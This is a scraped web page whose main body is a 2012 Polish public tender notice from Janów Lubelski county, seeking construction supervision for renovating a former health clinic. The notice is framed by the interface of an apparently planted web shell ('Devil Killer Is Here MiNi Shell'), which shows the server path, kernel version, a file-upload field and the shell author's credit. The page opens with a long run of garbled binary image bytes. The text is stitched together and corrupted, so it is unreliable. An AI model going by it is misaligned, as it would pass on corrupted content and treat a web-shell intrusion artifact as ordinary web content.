JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120731/278828-N-2012.html

<p class="kh_header"><b>Janów Lubelski: Sprawowanie funkcji inspektora nadzoru nad robotami budowlanymi związanymi z rozbudową i przebudową budynku po byłej przychodni zdrowia przy ul. Zamoyskiego 77 w Janowie Lubelskim dla potrzeb: Powiatowego Centrum Pomocy Rodzinie, Poradni Psychologiczno - Pedagogicznej, Ośrodka Rewalidacyjno - Edukacyjno-Wychowawczego</b><br>
<b>Numer ogłoszenia: 278828 - 2012; data zamieszczenia: 31.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Janowie Lubelskim , ul. Zamoyskiego 59, 23-300 Janów Lubelski, woj. lubelskie, tel. 015 8723070, 8720309, faks 015 8723070.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatjanowski.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprawowanie funkcji inspektora nadzoru nad robotami budowlanymi związanymi z rozbudową i przebudową budynku po byłej przychodni zdrowia przy ul. Zamoyskiego 77 w Janowie Lubelskim dla potrzeb: Powiatowego Centrum Pomocy Rodzinie, Poradni Psychologiczno - Pedagogicznej, Ośrodka Rewalidacyjno - Edukacyjno-Wychowawczego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sprawowanie nadzoru inwestorskiego (zgodnie z art. 25 i 26 ustawy Prawo budowlane Dz.U. z 2006 r. Nr 156 poz. 1118 z późn.zm.) nad robotami budowlanymi związanymi z związanymi z rozbudową i przebudową budynku po byłej przychodni zdrowia przy ul. Zamoyskiego 77 w Janowie Lubelskim dla potrzeb: Powiatowego Centrum Pomocy Rodzinie, Poradni Psychologiczno - Pedagogicznej, Ośrodka Rewalidacyjno - Edukacyjno-Wychowawczego poprzez ustanowienie inspektorów nadzoru w specjalnościach:
-   konstrukcyjno budowlanej
-   sanitarnej
-   robót elektrycznych
Zakres nadzorowanych robót obejmuje:
I etap do dnia 30 listopada 2012 roku:
1.	Wykonanie dachu bez izolacji
-	Roboty rozbiórkowe (konstrukcje 53,41 m2, pokrycie 455,10 m2, kominy, obróbki 77,90 m2, rynny i rury 117,60 m).        
-	Roboty murowe (20,72 m2).
-	Konstrukcje żelbetowe, zbrojenia (słupy żelbetowe, wieńce , zbrojenia).
-	Konstrukcja drewniana dachu.
-	Pokrycie dachowe z blachodachówki  460m2.
-	Obróbki blacharskie, rynny, rury spustowe, właz dachowy.
-	Klapy dymowe - 2szt.
-	Roboty murarskie - kominy 140 m
2.	Wykonanie przyłącza wodociągowego (rozbiórki i montaż) , kanalizacji sanitarnej (roboty ziemne i montaż) oraz odwodnienia przed budynkiem (roboty ziemne                                     i montażowe- rurociągi, studnia chłonna, odwodnienie liniowe)
3.	Drogi parkingi, uksztaltowanie terenu przed budynkiem
a) roboty drogowe rozbiórkowe 105 m2 i ziemne
b) parking i dojazd do budynku z kostki brukowej 57,60 m2
c) ciągi piesze z kostki brukowej 61,00 m2
d) zieleń (wycinka 1 drzewa, trawniki 120m2)
4.      Roboty budowlane bez elewacji
a) piwnice (rozbiórki, roboty ziemne, fundamenty, konstrukcje i zbrojenia, ściany działowe 183,84 m2, stolarka drzwiowa - drzwi drewniane 8,8 m2, drzwi stalowe 3,6 m2, tynki wewnętrzne 630,31 m2, licowanie ścian płytkami 5,4 m2, podłoża, posadzki i cokoliki z płytek gresowych 357,53 m2, malowanie 624,91 m2, balustrady schodowe 2,62 m, izolacja  piwnic).
b) parter (rozbiórki, przewody wentylacyjne- kanały z pustaków ceramicznych 71,99m,  konstrukcje i schody żelbetowe, roboty zbrojarskie, konstrukcje stalowe, ściany działowe 173,13 m2, drzwi wewnętrzne drewniane 46,20 m2, tynki wewnętrzne 1196,33 m2, licowanie ścian płytkami 395,31 m2, sufity podwieszone 13, 9 m2, podłoża i posadzki - płytki gresowe 143,04 m2, cokoliki z płytek, posadzki z wykładziny rulonowej PCW 223,44 m2, malowanie 801,02 m2 , balustrady schodowe wewn. 5,4 m, zewn. 8,34 m, wykonanie schodów zewnętrznych do budynku).
c) I piętro (rozbiórki, przewody wentylacyjne- kanały z pustaków ceramicznych 140,85 m,  konstrukcje i schody żelbetowe, roboty zbrojarskie, konstrukcje stalowe, ściany działowe 170,57m2, drzwi wewnętrzne drewniane 38,60 m2, tynki wewnętrzne 1261,63 m2, licowanie ścian płytkami 93,98 m2, sufity podwieszone 16,9 m2, podłoża i posadzki - płytki gresowe 92,11 m2, cokoliki z płytek, posadzki z wykładziny rulonowej PCW 24,6 m2, posadzki                         z wykładziny dywanowej 245,52 m2, malowanie 1167,65 m2, balustrady schodowe wewn. 9,23 m).
d) II piętro (rozbiórki,  roboty ziemne i fundamenty do szybu windowego, przewody wentylacyjne- kanały z pustaków ceramicznych 196,48 m,  konstrukcje i schody żelbetowe, roboty zbrojarskie, konstrukcje stalowe, ściany działowe 172,59 m2 , ścianki mobilne - 2 szt., drzwi wewnętrzne drewniane 37,20 m2, tynki wewnętrzne 1143,38 m2, licowanie ścian płytkami 152,16 m2, panele akustyczne 368,37 m2, sufity podwieszone 38,60 m2, podłoża                       i posadzki - płytki gresowe 99,60 m2, cokoliki z płytek, posadzki z wykładziny rulonowej PCW 204,72 m2, posadzki z wykładziny dywanowej 27,48 m2, malowanie 622,85 m2, balustrady schodowe wewn. 3,80 m).
5.     Wykonanie instalacji elektrycznych i teletechnicznych (bez oświetlenia).
Demontaże, montaże korytek kablowych, tablice główna i rozdzielcze, gniazda wtyczkowe, wewnętrzne linie zasilające,  sieć logiczna i telefoniczna,  instalacja zasilania obwodów komputerowych, instalacja wentylacji mechanicznej i klap p/poż, instalacja połączeń wyrównawczych, instalacja przyzywowa, ochrona p/poż, instalacja oddymiania, instalacja podgrzewania rynien, instalacja odgromowa.
6.      Instalacja wod - kan i CWU.
Instalacja kanalizacji sanitarnej, instalacja wody ciepłej i zimnej, przybory sanitarne i baterie, izolacje cieplne, demontaże starych instalacji.

II etap do dnia 30 czerwca 2013 roku:
1.	Piwnice - roboty budowlane:  okna PCW  7,56 m2, podokienniki i nawiewniki - 17 szt.
2.	Parter - roboty budowlane: roboty murowe, okna PCW antywłamaniowe  32,54 m2, aluminiowe antywłamaniowe 4,56 m2 , podokienniki i nawiewniki - 17 szt., drzwi i ścianki aluminiowe i stalowe 34,30 m2.
3.	I PIĘTRO - roboty budowlane: roboty murowe, okna PCW 34,82 m2, podokienniki                                  i nawiewniki - 19 szt., drzwi i ścianki aluminiowe 7,28 m2.
4.	 II PIĘTRO - roboty budowlane: roboty murowe, okna PCW 38,53 m2, podokienniki                             i nawiewniki - 19 szt., drzwi i ścianki aluminiowe 14,40 m2. 
5.	Instalacje co i ct -demontaże, rurociągi miedziane, grzejniki stalowe, rurociągi ct, izolacje termiczne dla rurociągów - długość instalacji 688 m. 
6.	Instalacje oświetleniowe - wymiana oświetlenia  na system LED oraz wykonanie oświetlenia awaryjnego i ewakuacyjnego.
7.	Instalacja wentylacji mechanicznej nawiewno - wywiewnej z automatyką czasu pracy. 
8.	Docieplenie stropu-  wykonanie izolacji  z  wełny mineralnej o  grubości 30 cm -  336,07 m2.
9.	Wykonanie elewacji  całego budynku -  docieplenie ścian zewnętrznych bezspoinowym systemem  docieplenia ścian -grubość  styropianu 14 cm - 792,68 m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.70.00.00-5, 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, które Wykonawcy są zobowiązani spełnić.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykaże się wykonaniem jednej usługi o wartości min. 60.000 zł (brutto), polegającej na nadzorze inwestorskim nad robotami związanymi z remontem obiektów budowlanych                                       w specjalnościach: konstrukcyjno-budowlanej, sanitarnej i robót elektrycznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, które Wykonawcy są zobowiązani spełnić.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie tego warunku, jeżeli Wykonawca wykaże, że dysponuje:
a)    osobą posiadającą:
       -  uprawnienia budowlane do pełnienia obowiązków inspektora nadzoru w specjalności konstrukcyjno budowlanej,
b)    osobą posiadającą:
-   uprawnienia budowlane do pełnienia obowiązków inspektora nadzoru w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych                                          i elektroenergetycznych, 
c)    osobą posiadającą:
       -  uprawnienia budowlane do pełnienia obowiązków inspektora nadzoru w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, które Wykonawcy są zobowiązani spełnić.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.   Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy                    w niżej wymienionych przypadkach:                                                                                                     a)  zmiana adresu/siedziby Zamawiającego/Wykonawcy,                                                                    b)  zmiana osób występujących po stronie Zamawiającego/Wykonawcy, 
2.   Możliwa jest zmiana terminu wykonania umowy, ewentualnie wstrzymanie/wznowienie robót, ze względu na:                                                                                                                     a)   przedłużenie procedury przetargowej,                                                                                                       b)   technologię wykonywania robót,                                                                                                 c)   niesprzyjające warunki atmosferyczne,                                                                                                                       d)  zmiana postanowień umowy w związku  ze zmianą stawki podatku od towarów i usług    (VAT) w przypadku zmiany obowiązujących,  w tym  zakresie przepisów,                                                   e)   przedłużanie się terminu wykonania robót budowlanych, którymi objęty jest nadzór.
3.	 Określa się następujący tryb dokonywania zmian postanowień umowy:                                             a)  zmiana postanowień zawartej umowy może nastąpić wyłącznie, za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności,                                                                                     b)   strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do   udokumentowania zaistnienia powyższych okoliczności,                                                                           c)  wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.
4.  W przypadku przedłużenia terminu wykonania robót budowlanych Strony umowy określą  aneksem warunki oraz termin kontynuowania nadzoru.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatjanowski.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Janowie Lubelskim
ul. Zamoyskiego 59
23-300 Janów Lubelski pok. Nr 314.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2012 godzina 09:00, miejsce: Starostwo Powiatowe w Janowie Lubelskim
ul. Zamoyskiego 59
23-300 Janów Lubelski pok. 202.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com